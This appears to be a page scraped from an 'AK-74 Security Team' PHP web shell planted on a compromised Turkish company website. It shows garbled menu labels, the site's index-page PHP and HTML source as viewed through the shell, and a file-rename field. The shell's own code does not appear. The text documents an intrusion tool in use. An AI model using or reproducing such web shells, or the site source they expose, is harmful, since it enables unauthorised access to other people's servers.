.:: :[ AK-74 Security Team Web-shell ]: ::.
����� ����������
�������� ��������
phpinfo()
��������� PHP
��������� �������
�������������� �����
<!DOCTYPE html> <!--[if IE 6]> <html id="ie6" class="ancient-ie old-ie no-js" dir="ltr"> <![endif]--> <!--[if IE 7]> <html id="ie7" class="ancient-ie old-ie no-js" dir="ltr"> <![endif]--> <!--[if IE 8]> <html id="ie8" class="old-ie no-js" dir="ltr"> <![endif]--> <!--[if !(IE 6) | !(IE 7) | !(IE 8) ]><!--> <?php include('db.php'); $yar = $bag->query("select * from ayarlar where ayar_id=1")->fetch(PDO::FETCH_ASSOC); ?> <html dir="ltr" class="no-js"> <!--<![endif]--> <head> <meta charset="UTF-8" /> <meta name="viewport" content="initial-scale=1, maximum-scale=2"> <meta keywords="<?php echo $yar['keywords']; ?>" /> <title><?php echo $yar['siteadi']; ?></title> <base href="<?php echo $yar['siteurl']; ?>"> <!--[if IE]> <script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <link href="css/normalize.css" rel="stylesheet" type="text/css"> <link href="css/wireframe.css" rel="stylesheet" type="text/css"> <link href="css/main.css" rel="stylesheet" type="text/css"> <link href="css/media.css" rel="stylesheet" type="text/css"> <link href="skins/red/custom.css" rel="stylesheet" type="text/css" id="skin-style"> <!-- RoyalSlider --> <link rel="stylesheet" href="royalslider/royalslider.css"> <link rel="stylesheet" href="css/plugins.css"> <link rel="stylesheet" href="js/plugins/pretty-photo/css/prettyPhoto.css" type="text/css"> <link href="http://fonts.googleapis.com/css?family=Lato:400,700,900" rel="stylesheet" type="text/css"> <!-- All skins --> <link href="http://fonts.googleapis.com/css?family=Titillium+Web:600,600italic" rel="stylesheet" type="text/css"> <!-- "Retro" skin --> <link href="http://fonts.googleapis.com/css?family=Patua+One" rel="stylesheet" type="text/css"> <!-- "Business" skin --> <link href="http://fonts.googleapis.com/css?family=Roboto+Condensed" rel="stylesheet" type="text/css"> <!-- "Green" skin --> <link href="http://fonts.googleapis.com/css?family=Sanchez" rel="stylesheet" type="text/css"> <!-- "Organic" skin --> <script src="js/modernizr.js"></script> </head> <body class="page"> <div id="page" ><!-- class="boxed" --> <!-- !Top-bar --> <?php include('ust.php'); ?> <header id="header" class="logo-left overlap" role="banner"><!-- class="overlap"; class="logo-left", class="logo-center", class="logo-classic" --> <div class="wf-wrap"> <div class="wf-table"> <!-- !- Branding --> <div id="brandin" class="wf-td"> <?php include('db.php'); $logo = $bag->query("select * from sitelogo where logo_id=1")->fetch(PDO::FETCH_ASSOC); ?> <a href="anasayfa"><img src="usr/<?php echo $logo['logo']; ?>" width="189" height="79" alt=""></a> </div> <!-- !- Navigation --> <?php include('header.php'); ?> </div><!-- .wf-table --> </div><!-- .wf-wrap --> </header><!-- #header --> <!-- !Main slideshow --> <div id="main-slideshow" data-width="1200" data-height="500" data-autoslide="7000" data-scale="fill" data-paused="false"><!-- class="fixed" --> </div><!-- #main-slideshow --> <div id="main" class="sidebar-none"><!-- class="sidebar-none", class="sidebar-left", class="sidebar-right" --> <div class="wf-wrap"> <div class="wf-container-main"> <?php include('slideralt.php'); ?> <div class="gap-30"></div> <div class="gap-30"></div> <!-- !- Content --> <div class="content"> <!-- !-- Stripe --> <div class="stripe stripe-style-1" style="margin-top: -45px;"> <div class="gap-30"></div> <div class="wf-container"> <div class="wf-cell wf-3-4"> <!-- !-- Benefits --> <section class="benefits-grid wf-container icons-bg"><!-- class="icons-bg" --> <?php include('kutular.php'); ?> </section> </div> <div class="wf-cell wf-1-4"> <?php include('db.php'); $altsag = $bag->query("select * from altsag where altsag_id=1")->fetch(PDO::FETCH_ASSOC); ?> <p><?php echo $altsag['metin']; ?></p> </div> </div> </div> <!-- !-- Stripe --> <div class="slider-wrapper shortcode-instagram full" style="margin-bottom: -40px;"> <div class="frame fullwidth-slider" style="height:90px;"> <ul class="clearfix" style="height:90px;"> <?php include('db.php'); $tr = $bag->query("select * from projeresimler")->fetchAll(PDO::FETCH_ASSOC); foreach($tr as $kr){ ?> <li class="fs-entry"> <img width="90" height="90" alt="" src="usr/proje/<?php echo $kr['resim']; ?>"> <span class="link"><a href="usr/proje/<?php echo $kr['resim']; ?>" rel="prettyPhoto" ></a></span> </li> <?php } ?> </ul> </div> <div class="fs-navigation controls center"> <div class="prev"></div> <div class="next"></div> <div class="fs-title">Son Proje Görselleri</div> </div> </div> <div class="gap-40"></div> <div class="stripe stripe-style-2" style="padding-bottom: 0; margin-top:0"> <section class="shortcode-action-box box-style-table"> <?php include('ortaslogan.php'); ?> </section><!-- .action-box --> </div> <div class="gap-40"></div> <div class="gap-10"></div> <div class="wf-container"> <div class="wf-cell wf-1-4"> <h2 class="entry-title">Sıkça Sorulan Sorular</h2> <div class="gap-10"></div> <?php include('sorucevap.php'); ?> </div> <div class="wf-cell wf-1-2"> <!-- !- Tabs --> <?php include('sekmeler.php'); ?><!-- .tabs --> </div> <div class="wf-cell wf-1-4"> <?php include('duyurular.php'); ?> <div class="gap-40"></div> </div> </div> <!-- Begin Full Width Slider two --> <div class="slider-wrapper full" style="margin-bottom: -40px;"> <?php include('projeler.php'); ?> </div> <!-- End Full Width Slider --> <!-- !-- Stripe --> <!-- Begin Full Width Slider two --> <!-- End Full Width Slider --> </div><!-- .content --> </div><!-- .wf-container-main --> </div><!-- .wf-wrap --> </div><!-- #main --> <?php include('footer.php'); ?> <!-- !Bottom-bar --> <?php include('alt.php'); ?> </div><!-- #page --> <?php include('slider.php'); ?> <script src="js/jquery-1.9.1.min.js"></script> <script src="js/jquery-migrate-1.1.1.min.js"></script> <!-- RoyalSlider --> <script src="royalslider/jquery.royalslider.js"></script> <script src="js/plugins/pretty-photo/js/jquery.prettyPhoto.js"></script> <script src="js/plugins.js"></script> <script src="js/main.js"></script> <link rel="stylesheet" href="presscore-demo/css/show.css" type="text/css" /> </body> </html>
Rename:
-